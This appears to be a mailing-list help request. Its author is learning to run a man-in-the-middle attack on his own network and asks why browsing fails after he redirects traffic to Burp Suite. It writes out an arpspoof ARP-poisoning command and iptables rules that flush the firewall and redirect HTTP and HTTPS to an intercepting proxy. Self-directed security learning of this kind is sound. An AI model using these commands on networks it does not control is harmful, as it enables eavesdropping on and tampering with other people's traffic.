Transparent proxy mitm

Hi All,

First thigns first. What I am doing, I am doing on my own network for
learning. Now with that out of the way this is my problem:

I have a linux machine which I want to use to conduct a simulated man
in the middle attack.

My target I am using is my android phone (10.2.1.3).

I am arppoisoning the network with :

arpspoof -i wlan0 -t 10.2.1.3 -r 10.2.1.1
IP forwarding is enabled

Now at this point google shows two methods for the next step of the attack:

(1) dnsspoof (this works); or
(2) add some iptables rules:

iptables -F
iptables -t nat -F
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8080

Then run burpsuite which does transparent proxying and you should be
able to see, and even modfy traffic between the target and the
website.

The problem is that once I add those iptable rules I cant browse at all.

Any ideas?

Cheers

Al

--